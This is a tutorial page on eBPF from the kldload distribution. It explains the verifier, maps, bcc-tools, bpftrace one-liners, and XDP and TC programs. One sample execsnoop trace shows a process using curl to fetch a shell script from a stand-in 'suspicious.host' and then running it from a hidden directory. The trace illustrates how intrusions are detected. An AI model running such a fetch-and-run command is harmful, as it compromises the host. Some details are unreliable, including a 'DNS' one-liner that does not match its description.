| pick your distro, get ZFS on root
kldload — your platform, your way, free
Source

eBPF Masterclass

This guide goes deep on eBPF — the kernel extension mechanism that powers Cilium, Falco, every modern performance profiler, and most of what makes Linux observability fast and precise. If you have read the Networking tutorial and seen eBPF in the context of packet filtering, this is the next step: understanding what eBPF actually is, how it works, and how to use the full toolkit that ships with kldload to answer any question about what your kernel is doing.

What this page covers: the eBPF execution model, program types, maps, the verifier, bcc-tools, bpftrace one-liners, XDP packet processing, TC programmable policy, socket-level interception, map internals, writing production programs with CO-RE and BTF, security considerations, and a complete reference to the eBPF toolkit on kldload.

Prerequisites: familiarity with the Linux kernel/userland split (see Kernel vs Userland). You do not need to have written C before, but you will see C code snippets. The goal is understanding, not compilation.


1. What eBPF Actually Is

eBPF is a programming environment inside the Linux kernel. You write small programs in a restricted subset of C, compile them to eBPF bytecode, and load them into the kernel where they attach to events — a packet arriving at a NIC, a syscall being called, a kernel function being entered or returned from. When that event fires, your program runs. In the kernel. At kernel speed. Without a context switch, without copying data to userland, without a daemon in the way.

The manifesto: eBPF is not a networking technology. It is not an observability technology. It is a general-purpose kernel extension mechanism that happens to be incredible at both. Cilium is an eBPF application. bpftrace is an eBPF application. Falco is an eBPF application. The Linux perf subsystem increasingly uses eBPF internally. Understanding that eBPF is the mechanism — not the use case — matters because it means you can use eBPF for anything that touches the kernel, not just the use cases someone already built a tool for. If you can express your question as "when kernel event X happens, record Y," eBPF can answer it.

How it works, in one paragraph

You write a C function annotated with the event it should attach to. The clang compiler (with the BPF target) compiles it to eBPF bytecode — a RISC-like instruction set with 11 registers and 512 bytes of stack. You call bpf(BPF_PROG_LOAD) to hand the bytecode to the kernel. The kernel verifier checks it (see below). If it passes, the bytecode is JIT-compiled to native machine code and attached to the hook. The next time that event fires, your native machine code runs in the kernel.

// userland calls bpf() syscall to load program // kernel verifier checks it: safe? terminates? no bad pointers? // JIT compiles to x86/arm64 native code // attaches to event hook // event fires → your code runs, in kernel, zero userland involvement

The verifier — why eBPF can't crash the kernel

Before any eBPF program runs, the kernel's verifier performs static analysis on the bytecode. It proves the program terminates (no infinite loops — bounded loops only), never accesses memory out of bounds, never follows uninitialized pointers, never calls arbitrary kernel functions (only a whitelist of BPF helper functions), and always returns an appropriate value. A program that fails verification is rejected with an error message — it never loads. A program that passes is mathematically guaranteed not to crash the kernel.

// NOT like a kernel module — modules can crash the kernel freely // eBPF: statically proven safe before it touches production kernel // This is why Google, Meta, Netflix run eBPF in their kernels

Kernel modules vs eBPF

Kernel modules run arbitrary C code in the kernel — they can do anything, including corrupting memory and causing panics. They require a matching kernel version and recompilation when the kernel changes. eBPF programs run a verified, sandboxed bytecode. They cannot crash the kernel. With CO-RE (see section 10), they compile once and run on any kernel that has BTF enabled — which includes every kldload kernel.

// kernel module: ring 0, arbitrary code, recompile per kernel // eBPF: ring 0 speed, sandboxed, verified, portable across kernels

What "eXtended" means

The original BPF (Berkeley Packet Filter, 1992) was a 32-bit, 2-register, packet-only filter language — tcpdump still uses it. eBPF (extended BPF, Linux 3.18, 2014) is a completely different machine: 64-bit, 11 registers, maps for persistent state, helper functions for kernel services, and attachment points across the entire kernel — not just packets. The "e" in eBPF is significant: this is a general-purpose kernel programming environment, not a packet filter with extra steps.

// cBPF (classic): tcpdump filter language, packets only // eBPF: programmable kernel hooks for everything, everywhere, always
eBPF is not a networking technology. It is not an observability technology. It is a general-purpose kernel extension mechanism that happens to be incredible at both. Understanding this distinction matters because it means you can use eBPF for anything that touches the kernel — not just the use cases someone already built a tool for. When a company says "we built our networking on eBPF" or "we do security monitoring with eBPF," they mean they built a specific application that uses the eBPF mechanism. The mechanism itself is neutral — it is a way to run verified code at kernel events. The applications are endless.

2. The eBPF Execution Model

To use eBPF effectively you need a mental model of how programs run, how they communicate with userland, and what constraints they operate under. None of this is complicated once you see the pieces.

Program Types

Every eBPF program has a type that determines where it attaches and what context it receives. The type is declared at load time and constrains which helper functions are available.

XDP — eXpress Data Path

Attaches to the NIC driver, before the kernel allocates an sk_buff. Receives raw packet bytes. Can return PASS (continue to kernel stack), DROP (discard immediately), TX (retransmit out the same interface), REDIRECT (send to another interface or CPU), or ABORTED (drop with error). Fastest possible hook — runs before memory allocation.

// Attachment: NIC driver hook, pre-sk_buff // Context: xdp_md { data, data_end, ingress_ifindex } // Use: DDoS mitigation, load balancing, fast packet filtering

TC — Traffic Control

Attaches to the TC ingress or egress hook. Has access to the full sk_buff — socket buffer with all headers parsed, routing decision made, conntrack state available. Can modify packets, redirect, or drop. Used by Cilium for all pod-level network policy. Slower than XDP (sk_buff allocation has happened) but far more capable.

// Attachment: tc qdisc ingress/egress // Context: __sk_buff (full socket buffer metadata) // Use: policy enforcement, traffic shaping, packet modification

kprobe / kretprobe

Attaches to any kernel function entry (kprobe) or return (kretprobe). Receives function arguments or return values. Powerful but fragile — kernel function signatures change between versions. bpftrace uses kprobes under the hood. Used for debugging and dynamic tracing of arbitrary kernel behavior.

// Attachment: kernel function entry/return // Context: function arguments (kprobe) or return value (kretprobe) // Use: debugging, dynamic tracing, performance profiling

Tracepoint

Attaches to stable, versioned kernel tracepoints — instrumentation points that kernel developers mark as part of the stable ABI. More portable than kprobes (tracepoints don't change between kernel versions). Covers syscalls, scheduler events, block I/O, network events. bcc tools prefer tracepoints over kprobes for stability.

// Attachment: kernel tracepoint (stable ABI) // Context: tracepoint-specific struct with event fields // Use: syscall auditing, scheduler analysis, I/O tracing

Socket programs — sk_msg, sockops, sk_lookup

sockops fires on socket operations (connect, accept, etc.) and can set socket options. sk_msg fires on every message sent through a socket. sk_lookup intercepts socket lookup and can redirect to a different socket. Together these allow Cilium to short-circuit the network stack for same-node pod communication.

// Attachment: socket lifecycle events or message send // Context: bpf_sock_ops, sk_msg_md, bpf_sk_lookup // Use: socket-level redirection, same-node pod acceleration

cgroup programs

Attaches to a cgroup and applies to all processes in that cgroup. Types include cgroup_skb (filter outbound socket traffic), cgroup_sock (intercept socket creation), cgroup_device (control device access). Kubernetes uses cgroup v2; Cilium uses cgroup programs to enforce network policy at the cgroup level rather than the network namespace level.

// Attachment: cgroup hierarchy // Context: bpf_sock, __sk_buff // Use: per-container policy, resource limits, socket auditing

Maps — Shared State Between Kernel and Userland

eBPF programs are stateless by themselves — each invocation starts fresh. Maps are the persistent store. A map is a key-value data structure that lives in kernel memory but is accessible from both eBPF programs and userland. An eBPF program updates a counter in a map; your Go monitoring daemon reads that counter via bpf(BPF_MAP_LOOKUP_ELEM). This is the bridge between kernel speed and human readability. Map types are covered in detail in section 9.

How maps work

Maps are created by calling bpf(BPF_MAP_CREATE) with a type, key size, value size, and max entries. The kernel returns a file descriptor. eBPF programs access maps through a file descriptor reference embedded in the bytecode. Userland programs access maps through the same fd or by pinning the map to the BPF filesystem at /sys/fs/bpf/.

// eBPF program: bpf_map_lookup_elem(&my_map, &key) // in kernel // userland: bpf(BPF_MAP_LOOKUP_ELEM, map_fd, &key, &value) // syscall // Both sides see the same data. The map is the interface.

Pinning maps to /sys/fs/bpf/

Maps are reference-counted — they persist as long as something holds a reference (a loaded program or an open fd). Pinning a map to the BPF filesystem creates a persistent file that survives the loading process exiting. Multiple programs and tools can then open the pinned map by path. This is how bpftool inspects maps created by Cilium or other long-running daemons.

// bpftool map pin /sys/fs/bpf/my_map id 42 // bpftool map dump pinned /sys/fs/bpf/my_map // Works even if the process that created the map has exited
The verifier is what makes eBPF safe. It is not a runtime sandbox — it is a static proof. Before your program loads, the verifier constructs a directed acyclic graph of all possible execution paths and checks every path against safety invariants: bounded loops (added in kernel 5.3), no out-of-bounds memory access, no uninitialized data reads, no invalid pointer dereferences, no calls to arbitrary kernel functions. A program that the verifier cannot prove safe is rejected. This is why eBPF can run in production kernels at companies like Google and Meta — the safety guarantees are mathematical, not runtime heuristics. The verifier error messages are notoriously terse, but bpftool and libbpf's verbose mode will show you the exact instruction and invariant that failed.

3. eBPF on kldload

kldload ships the complete eBPF toolkit out of the box. No dependency hunting, no kernel header mismatches, no pip install chains. Everything is present on the live ISO and installed to every target system that uses the desktop or server profile.

Tool What it gives you How to use it
bcc-tools 80+ ready-made eBPF programs for networking, disk, CPU, memory /usr/share/bcc/tools/ — each is a standalone command
bpftrace One-liner kernel tracing language built on eBPF bpftrace -e 'tracepoint:syscalls:sys_enter_* { @[probe] = count(); }'
bpftool Low-level inspection: list programs, dump maps, show BTF bpftool prog list, bpftool map dump id N
kernel headers Required to compile eBPF programs against kernel types /usr/include/linux/, installed via kernel-headers package
libbpf C library for loading and managing eBPF programs from userland Link against it in your C/Go/Rust programs
BTF support BPF Type Format — enables CO-RE portability across kernels /sys/kernel/btf/vmlinux exists on all kldload kernels

The kernel version matters. XDP was stable in 4.8. Maps with per-CPU types in 4.6. Bounded loops (required for complex programs) in 5.3. BTF in 5.2. bpf_ringbuf (low-overhead event streaming) in 5.8. kldload ships kernel 5.14+ on CentOS Stream 9 and 6.1+ on Debian 13 — all modern eBPF features are available and all bcc tools work without caveats.

Most eBPF tutorials start with "install 15 dependencies." You need clang, llvm, kernel headers matching your exact running kernel, libbpf, python3-bpfcc, and then hope the versions align. On kldload, everything is pre-installed and version-matched at build time. bcc-tools gives you 80+ production-ready eBPF programs — each one is a standalone script that answers a specific operational question. bpftrace gives you one-liners that compile to eBPF on the fly. bpftool gives you low-level inspection of every eBPF program and map running on the system, including Cilium's. You can be tracing kernel events within 30 seconds of booting a kldload system.

4. bcc-tools — 80+ Ready-Made eBPF Programs

The BCC (BPF Compiler Collection) ships a library of production-grade eBPF tools that cover the most common operational questions across networking, disk, CPU, and memory. Each tool is a Python or C program that compiles an eBPF program on demand, loads it, and presents formatted output. They are in /usr/share/bcc/tools/ or accessible directly by name if the package installs symlinks.

Category overview

Networking tools

tcpconnect — every outbound TCP connection with PID, comm, source/dest IP/port, and latency. tcpaccept — every inbound accepted connection. tcpretrans — TCP retransmits with full 4-tuple and retransmit state. tcpdrop — TCP drops at the kernel level with reason codes. tcplife — TCP session lifetimes with bytes transferred.

// tcpconnect: "what is making outbound connections right now?" // tcpretrans: "which connections are retransmitting and why?" // No tcpdump overhead, no packet copies, sub-microsecond attach time

Disk I/O tools

biolatency — block I/O latency histogram (power-of-2 buckets, microsecond resolution). biosnoop — per-I/O tracing with PID, comm, disk, offset, size, and latency. ext4slower — ext4 operations slower than a threshold (also: xfsslower, btrfsslower, zfsslower). fileslower — any filesystem read/write above a latency threshold.

// biolatency -d sda: show disk latency histogram, summarize over time // biosnoop: "which process caused that I/O spike at 14:32:07?"

CPU and scheduler tools

profile — CPU profiler using sampling, produces flamegraph-compatible stacks. offcputime — time spent off-CPU (sleeping, waiting, blocked on I/O or locks). runqlat — CPU run queue latency histogram: how long did tasks wait before getting a CPU? cpudist — on-CPU time distribution per wakeup. softirqs / hardirqs — interrupt handler time histograms.

// runqlat: the gap between "task is ready to run" and "task gets CPU" // This is the metric that tells you if you're CPU-starved before top does

Memory tools

memleak — allocations without corresponding frees, grouped by call stack. oomkill — OOM kill events with the victim process, its memory stats, and what triggered the kill. shmsnoop — shared memory operations. drsnoop — direct reclaim events (kernel trying to free memory synchronously, causing latency spikes).

// memleak -p PID: "is this process leaking memory?" // oomkill: fires the moment the OOM killer acts, before the log is written

Ten tools you should know immediately

tcpconnect

Shows every outbound TCP connection as it happens. You see the process name, PID, source IP, destination IP, and port — in real time, before the connection completes. Useful for auditing what your services are connecting to, catching unexpected outbound connections from compromised processes, and debugging connection failures.

$ tcpconnect PID COMM IP SADDR DADDR DPORT 1234 curl 4 192.168.1.10 93.184.216.34 80 1235 postgres 4 127.0.0.1 127.0.0.1 5432 1236 node 4 10.0.0.5 10.0.1.20 6379

biolatency

Block I/O latency histogram. Runs for N seconds and prints a power-of-2 histogram of I/O completion times. Instantly shows whether disk latency is predictable (tight histogram) or has outliers (long tail). The -D flag breaks it down per disk device.

$ biolatency -d sda 10 usecs : count distribution 0 -> 1 : 0 2 -> 3 : 12 4 -> 7 : 847 |**************| 8 -> 15 : 3421 |***************| 16 -> 31 : 982 |****| 32 -> 63 : 43 256 -> 511 : 3 <-- outliers

runqlat

CPU scheduler run queue latency. Shows how long tasks wait in the run queue before getting scheduled onto a CPU. A healthy system has nearly all tasks scheduled within 10 microseconds. Latency spikes above 1ms indicate CPU contention — too many runnable threads, too few CPUs, or scheduler interference from realtime tasks.

$ runqlat 10 usecs : count distribution 0 -> 1 : 12453 |********************| 2 -> 3 : 7821 |*************| 4 -> 7 : 3210 |*****| 8 -> 15 : 841 1024 -> 2047 : 14 <-- CPU starvation spikes

profile

CPU profiler. Samples stack traces at a specified frequency (default 49 Hz) across all CPUs. After the sampling window, prints a summary of hot stack frames sorted by count. Combine with flamegraph.pl to produce a flamegraph SVG. Works for both kernel and userland stacks, with or without frame pointers (uses DWARF unwinding).

$ profile -F 99 30 | flamegraph.pl > /tmp/profile.svg # or just print the top functions: $ profile 30 Overhead Function Module 32.10% tcp_sendmsg kernel 18.40% __memcpy_avx_unaligned libc.so.6 9.21% process_backlog kernel

tcpretrans

TCP retransmit events with full 4-tuple and the retransmit state (ESTABLISHED, CLOSE_WAIT, etc.). This catches packet loss that is invisible to application logs — the kernel retransmits silently unless you are watching. Useful for diagnosing intermittent slowness that correlates with network congestion or faulty hardware.

$ tcpretrans TIME PID IP LADDR:LPORT T> RADDR:RPORT STATE 14:32:07 0 4 10.0.0.5:44312 R> 10.0.1.20:443 ESTABLISHED 14:32:07 0 4 10.0.0.5:44312 R> 10.0.1.20:443 ESTABLISHED # Two retransmits in one second = network problem, not app problem

offcputime

Time spent off-CPU — blocked, sleeping, waiting for I/O, waiting for a lock. While profile shows what your CPUs are doing, offcputime shows what your threads are waiting on. Essential for diagnosing slow services that are not CPU-bound: database queries, lock contention, slow syscalls, NFS stalls.

$ offcputime -p $(pgrep postgres) 10 Function Total(us) futex_wait 4,231,847 <-- lock contention ep_poll 823,441 <-- I/O wait schedule_timeout 190,223 <-- sleeping

ext4slower / xfsslower / zfsslower

Filesystem operations slower than a threshold (default 10ms). Shows the process, operation type (read/write/open/fsync), filename, size, and latency. The filesystem-specific variants parse the filesystem's internal function calls, not just VFS, so they capture cases where latency comes from filesystem-internal work (checksumming, journaling, copy-on-write).

$ zfsslower 1 TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME 14:33:01 postgres 4521 R 8192 0 12.4 pg_wal/000001 14:33:01 postgres 4521 F 0 0 11.8 pg_wal/000001 # Slow fsync on WAL — ZFS sync write latency issue

memleak

Memory leak detector. Traces malloc/free (and kernel allocations) and reports allocations with no corresponding free, grouped by call stack. Does not require recompilation or instrumentation of the target process — it attaches to the running process via uprobes. Run it for a few minutes, then look at what is growing.

$ memleak -p $(pgrep myapp) 60 Top 3 stacks with outstanding allocations: 96 bytes in 6 allocations from: myapp!parse_request+0x84 myapp!handle_conn+0x42 myapp!worker_loop+0x18 # 96 bytes leaked per request — easy to find now

opensnoop

Traces open() syscalls system-wide or for a specific PID. Shows which files every process is opening, when, and whether the open succeeded or failed. Useful for auditing file access, debugging "file not found" errors in containerized applications, and understanding the access patterns of unfamiliar processes.

$ opensnoop -p 1234 PID COMM FD ERR PATH 1234 nginx 6 0 /etc/nginx/nginx.conf 1234 nginx -1 2 /etc/nginx/ssl/cert.pem <-- ENOENT # Missing certificate — that's your 502 error

execsnoop

Traces every execve() call system-wide — every process launched, with its arguments. Indispensable for security auditing (what processes are running?), debugging cascading failure (what is this service spawning?), and understanding build systems or CI pipelines at a granular level.

$ execsnoop PCOMM PID PPID RET ARGS bash 12045 11983 0 /bin/bash -c curl http://suspicious.host/... curl 12046 12045 0 /usr/bin/curl http://suspicious.host/shell.sh sh 12048 12047 0 /bin/sh /tmp/.hidden/shell.sh # An execsnoop trace that finds a compromised process
These tools replace entire monitoring stacks for operational questions. tcpconnect shows every outbound TCP connection with PID and latency — that used to require a combination of netstat polling, strace on individual processes, and tcpdump captures. biolatency shows disk I/O latency histograms with microsecond resolution, for any disk, with no overhead when idle — that used to require sysstat, iostat, and manual histogram construction. runqlat shows CPU scheduler queue latency — that used to be invisible unless you had perf stat access and knew which counters to look at. Each bcc tool is a single command that answers a question that used to require hours of tool assembly and data correlation. The key insight is that these tools have near-zero overhead when the event they trace is rare — the eBPF program only runs when the kernel event fires. You can leave tcpretrans running in production permanently with no measurable impact.

5. bpftrace — One-Liner Kernel Tracing

bpftrace is a high-level tracing language that compiles to eBPF on the fly. The syntax is inspired by awk and DTrace. You write a probe specification, an optional filter, and an action — bpftrace compiles the action to an eBPF program, attaches it to the probe, and streams output. It is the fastest path from a question to an answer in the kernel.

Syntax overview

probe_type:probe_name / filter / {
    action
}

// probe_type: tracepoint, kprobe, kretprobe, uprobe, usdt, profile, interval, BEGIN, END
// filter: optional boolean expression (comm == "nginx", pid == 1234, etc.)
// action: bpftrace statements — printf, @maps, hist, count, etc.

// Built-in variables:
// pid, tid, uid, gid, comm (process name), cpu, nsecs, args (tracepoint args)
// retval (kretprobe return value), func (function name), curtask

// Map types:
// @x = count()     — counter
// @x = hist(val)   — power-of-2 histogram
// @x[key] = val    — associative map
// @x = lhist(val, min, max, step) — linear histogram

15 essential one-liners

Syscall counts per process

Count every syscall entry, grouped by process name. Print on Ctrl-C. Shows the system call profile of every running process in real time — which processes are making the most syscalls, and which syscalls.

bpftrace -e 'tracepoint:syscalls:sys_enter_* { @[comm, probe] = count(); }'

Files being opened

Print every filename passed to openat(), with the process name. System-wide file access tracer in one line. Add a filter like / comm == "nginx" / to scope it to a single process.

bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s %s\n", comm, str(args->filename)); }'

DNS queries

Trace outbound DNS queries at the socket level — every process, every query, no pcap. Uses the sendmsg tracepoint scoped to UDP on port 53. Prints process name and the raw bytes of the DNS packet (parse with a DNS library if needed).

bpftrace -e 'tracepoint:net:net_dev_xmit /skb->protocol == 8/ { @dns[comm] = count(); }'

TCP retransmits

Count TCP retransmit events per destination IP. The kernel fires tcp_retransmit_skb on every retransmit. This one-liner gives you a per-IP retransmit count that updates in real time — run it during a suspected network issue to find the problematic destination.

bpftrace -e 'kprobe:tcp_retransmit_skb { @[ntop(((struct sock *)arg0)->__sk_common.skc_daddr)] = count(); }'

New process exec

Print every process execution with its arguments. Built using the execve tracepoint — fires the moment execve is called, before the new process runs. Useful for security monitoring, debugging unexpected process spawning, or understanding what a build system does.

bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf("%s -> %s\n", comm, str(args->filename)); }'

Block I/O latency histogram

Measure time between block I/O issue and completion. Store issue timestamps in a map keyed by request pointer, then measure elapsed time on completion. Produces a power-of-2 histogram of latencies in microseconds — same as biolatency but in one bpftrace line.

bpftrace -e 'kprobe:blk_account_io_start { @start[arg0] = nsecs; } kprobe:blk_account_io_done /@start[arg0]/ { @us = hist((nsecs - @start[arg0])/1000); delete(@start[arg0]); }'

Page faults per process

Count page faults (both minor and major) per process name. A burst of major page faults means the kernel is reading data from disk into memory — working set is larger than physical RAM. A burst of minor faults is normal (anonymous memory allocation), but unusually high counts can indicate memory pressure.

bpftrace -e 'software:page-faults:1 { @[comm] = count(); }'

Context switches per process

Count voluntary and involuntary context switches per process. High involuntary context switch rates indicate the process is being preempted — it wants to run but is being forced off the CPU. High voluntary context switch rates indicate the process is frequently sleeping (I/O bound, lock waiting).

bpftrace -e 'tracepoint:sched:sched_switch { @[prev->comm] = count(); }'

Cache miss rate

Sample CPU cache misses using hardware performance counters. The hardware:cache-misses probe fires on LLC (last-level cache) miss events. High cache miss rates in hot code paths indicate poor data locality — a target for optimization or a sign of working set overflow.

bpftrace -e 'hardware:cache-misses:1000 { @[comm, ustack] = count(); }'

Read/write syscall latency histogram

Measure the latency of read() and write() syscalls per process. This captures I/O latency as seen by the application — including time waiting for the kernel, filesystem, and disk. Useful for correlating application-level slowness with kernel I/O overhead.

bpftrace -e ' tracepoint:syscalls:sys_enter_read { @ts[tid] = nsecs; } tracepoint:syscalls:sys_exit_read /@ts[tid]/ { @us[comm] = hist((nsecs-@ts[tid])/1000); delete(@ts[tid]); }'

Network interface packet rate

Count packets transmitted per network interface per second. Uses the net:net_dev_xmit tracepoint. Run it during a suspected traffic spike to identify which interface and which process is generating the traffic — before you even open tcpdump.

bpftrace -e 'tracepoint:net:net_dev_xmit { @pkts[str(args->name)] = count(); } interval:s:1 { print(@pkts); clear(@pkts); }'

Kernel function call counts

Count calls to any kernel function by name using kprobe. Useful for understanding how often a specific kernel code path is taken — e.g., how often the kernel drops into slow path for memory allocation, or how frequently a specific driver function is called during I/O.

bpftrace -e 'kprobe:tcp_v4_connect { @[comm] = count(); }' # Count TCP connect attempts per process — catches connection storms

malloc size distribution

Trace userland malloc() calls and build a histogram of allocation sizes for a specific process. Uses uprobes on libc. Shows whether a process is making many small allocations (fragmentation risk) or a few large ones (OOM risk), and what call stacks are doing the allocating.

bpftrace -e 'uprobe:/lib64/libc.so.6:malloc { @allocs = hist(arg0); }'

Signal delivery

Trace signal delivery events system-wide. Shows which process sent which signal to which target. Useful for debugging unexpected process termination (who sent SIGKILL?), OOM events (the OOM killer sends SIGKILL), and misbehaving signal handlers.

bpftrace -e 'tracepoint:signal:signal_deliver { printf("%s pid=%d sig=%d\n", comm, pid, args->sig); }'

Scheduler wakeup latency

Measure time between a task being woken up (made runnable) and actually running on a CPU. The gap is time spent in the run queue. Equivalent to runqlat but as a raw bpftrace one-liner that you can scope to a specific process or cgroup.

bpftrace -e ' tracepoint:sched:sched_wakeup { @ts[args->pid] = nsecs; } tracepoint:sched:sched_switch { if (@ts[args->next_pid]) { @wakeup_us = hist((nsecs - @ts[args->next_pid])/1000); delete(@ts[args->next_pid]); }}'
bpftrace is awk for the kernel. One line, one answer. "How many syscalls per second per process?" — one line. "What files is this process opening?" — one line. "What is the latency distribution of disk reads?" — one line. "Which process sent SIGKILL to my service?" — one line. The mental shift is to stop thinking of kernel visibility as something that requires specialized tools assembled in advance and start thinking of it as something you reach for the moment you have a question, the same way you would reach for awk to parse a log file. bpftrace compiles to eBPF on the fly. The latency from question to answer is the time it takes you to type the one-liner. On kldload, bpftrace is installed and the kernel is BTF-enabled, so every bpftrace one-liner works without any setup.

6. XDP — Packet Processing at the NIC Driver

XDP (eXpress Data Path) is the earliest kernel hook in the packet receive path. It runs before the kernel allocates an sk_buff — the large data structure that represents a packet in the normal Linux network stack. Because there is no sk_buff allocation, no routing lookup, no conntrack state check, XDP programs run at near-line-rate on modern NICs and can process millions of packets per second on a single CPU core.

XDP attachment modes

Native XDP — the driver itself calls the eBPF program before sk_buff allocation. Requires driver support (most modern NICs: Intel ixgbe/i40e, Mellanox mlx5, Broadcom bnxt, virtio-net). Fastest mode — processing happens in the NIC interrupt handler. Generic XDP — fallback for drivers without native support; runs after sk_buff allocation, so it loses the performance advantage but maintains the same API.

// Check if your NIC supports native XDP: ip link show dev eth0 | grep xdp // or: ethtool -i eth0 | grep driver // ixgbe, i40e, mlx5_core, virtio_net: native XDP supported

XDP return codes

XDP_PASS — let the packet continue to the normal kernel network stack. XDP_DROP — discard the packet immediately, no sk_buff allocated, no conntrack entry, no routing lookup. Zero allocation, zero overhead for dropped packets. XDP_TX — retransmit the packet out the same interface (useful for bounceback/reflection). XDP_REDIRECT — send to a different interface, CPU queue, or AF_XDP socket. XDP_ABORTED — drop with a tracepoint fired (debugging).

// XDP_DROP is the fastest DROP in Linux. // iptables DROP: allocate sk_buff, walk iptables chains, drop, free sk_buff // XDP_DROP: two instructions in the NIC driver, no allocation ever made

Concrete program: DDoS mitigation blocklist

// xdp_blocklist.c — drop packets from a blocklist map at NIC speed
#include <linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <bpf/bpf_helpers.h>

// Map: source IP (u32) → drop flag (u8). Updated from userland.
struct {
    __uint(type, BPF_MAP_TYPE_LRU_HASH);
    __uint(max_entries, 1000000);
    __type(key, __u32);
    __type(value, __u8);
} blocklist SEC(".maps");

SEC("xdp")
int xdp_filter(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end) return XDP_PASS;
    if (eth->h_proto != bpf_htons(ETH_P_IP)) return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end) return XDP_PASS;

    __u8 *blocked = bpf_map_lookup_elem(&blocklist, &ip->saddr);
    if (blocked && *blocked) return XDP_DROP;

    return XDP_PASS;
}

char _license[] SEC("license") = "GPL";
# Load the program (requires clang + llvm + kernel headers)
clang -O2 -target bpf -c xdp_blocklist.c -o xdp_blocklist.o
ip link set dev eth0 xdp obj xdp_blocklist.o sec xdp

# Add an IP to the blocklist from userland:
bpftool map update pinned /sys/fs/bpf/blocklist \
    key hex c0 a8 01 05 \      # 192.168.1.5 in little-endian hex
    value hex 01               # 1 = blocked

# Remove a program:
ip link set dev eth0 xdp off

Concrete program: XDP load balancer (REDIRECT to backend)

// Minimal XDP load balancer: hash src IP to one of N backends
// Full implementation needs MAC rewrite + ARP handling — this shows the structure

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 8);          // up to 8 backends
    __type(key, __u32);
    __type(value, __u32);            // backend interface ifindex
} backends SEC(".maps");

SEC("xdp")
int xdp_lb(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;
    struct iphdr *ip = data + sizeof(struct ethhdr);
    if ((void *)(ip + 1) > data_end) return XDP_PASS;

    __u32 backend_idx = bpf_ntohl(ip->saddr) % 8;
    __u32 *ifindex = bpf_map_lookup_elem(&backends, &backend_idx);
    if (!ifindex) return XDP_PASS;

    return bpf_redirect(*ifindex, 0);
}

Performance numbers: On a single core, XDP_DROP can achieve 10–14 million packets per second on a 10G NIC with native XDP driver support. An XDP load balancer with REDIRECT runs at 6–8 Mpps. Compare to iptables DROP at roughly 1–1.5 Mpps. Under a volumetric DDoS, this difference determines whether your server falls over or keeps serving legitimate traffic.

XDP runs before the kernel allocates sk_buff — before memory allocation, before routing lookup, before conntrack. This is why it is 10x faster than iptables for packet filtering. On a kldload server under DDoS, an XDP program can drop millions of attack packets per second while legitimate traffic flows through the normal stack untouched. The blocklist update is a map write from userland — atomic, lock-free, instantly visible to the XDP program on the next packet. You can block a new attack source in microseconds, without reloading the program, without touching iptables, without a service restart. A production DDoS mitigation system built on XDP looks like: a threat intelligence feed populates the blocklist map; the XDP program drops those packets at the NIC; everything else reaches the application. The entire mitigation path is a single hash table lookup per packet.

7. TC — Programmable Per-Packet Policy

TC (Traffic Control) eBPF programs attach to the Linux traffic control subsystem — the same qdisc layer that tc uses for bandwidth shaping and QoS. Unlike XDP, TC programs run after sk_buff allocation, which means they have access to the full packet metadata: socket information, routing decisions, conntrack state, cgroup membership, security identities. This makes TC the right choice for policy enforcement that needs context XDP cannot provide.

TC vs XDP: when to use which

Use XDP when you need maximum performance and the decision can be made from raw packet bytes alone — DDoS mitigation, simple stateless filtering, hardware offload. Use TC when you need socket context, routing info, cgroup membership, or conntrack state — policy enforcement, traffic accounting, marking packets with metadata for downstream processing.

// XDP: fastest, no sk_buff, limited context, ingress only (mostly) // TC: slightly slower, full sk_buff, all context, ingress AND egress // Cilium uses TC for everything: needs cgroup + identity context

Attaching TC programs

TC eBPF programs attach to a qdisc's ingress or egress hook using tc filter add. The clsact qdisc must be created first — it provides a direct-action hook that lets the eBPF program return a verdict without a separate classifier. Load with tc qdisc add dev eth0 clsact, then tc filter add dev eth0 ingress bpf da obj prog.o sec classifier.

// tc qdisc add dev eth0 clsact // tc filter add dev eth0 ingress bpf da obj prog.o sec classifier // tc filter add dev eth0 egress bpf da obj prog.o sec classifier // tc filter show dev eth0 ingress

Concrete program: per-source-IP packet counter

// tc_counter.c — count packets per source IP, readable from userland
#include <linux/bpf.h>
#include <linux/pkt_cls.h>
#include <linux/ip.h>
#include <bpf/bpf_helpers.h>

struct pkt_count {
    __u64 packets;
    __u64 bytes;
};

struct {
    __uint(type, BPF_MAP_TYPE_LRU_HASH);
    __uint(max_entries, 65536);
    __type(key, __u32);               // source IP
    __type(value, struct pkt_count);
} ip_counts SEC(".maps");

SEC("classifier")
int tc_ingress(struct __sk_buff *skb) {
    void *data     = (void *)(long)skb->data;
    void *data_end = (void *)(long)skb->data_end;
    struct iphdr *ip = data + 14;    // skip Ethernet header

    if ((void *)(ip + 1) > data_end) return TC_ACT_OK;

    struct pkt_count *cnt = bpf_map_lookup_elem(&ip_counts, &ip->saddr);
    if (cnt) {
        cnt->packets++;
        cnt->bytes += skb->len;
    } else {
        struct pkt_count new = { .packets = 1, .bytes = skb->len };
        bpf_map_update_elem(&ip_counts, &ip->saddr, &new, BPF_ANY);
    }
    return TC_ACT_OK;              // pass the packet through
}
# Read the map from userland after some traffic:
bpftool map dump pinned /sys/fs/bpf/ip_counts
# key: 05 01 a8 c0  (192.168.1.5 in network byte order)
# value: packets=18423  bytes=27634500

Traffic marking and classification

TC programs can set skb->mark or skb->priority for downstream processing by the normal qdisc tree. This is how you build eBPF-aware QoS: classify traffic in eBPF (full context, arbitrary logic), set a DSCP mark, and let the standard HTB or FQ_CoDel qdisc do the actual shaping. The eBPF program handles the classification logic; the existing TC infrastructure handles the queue management.

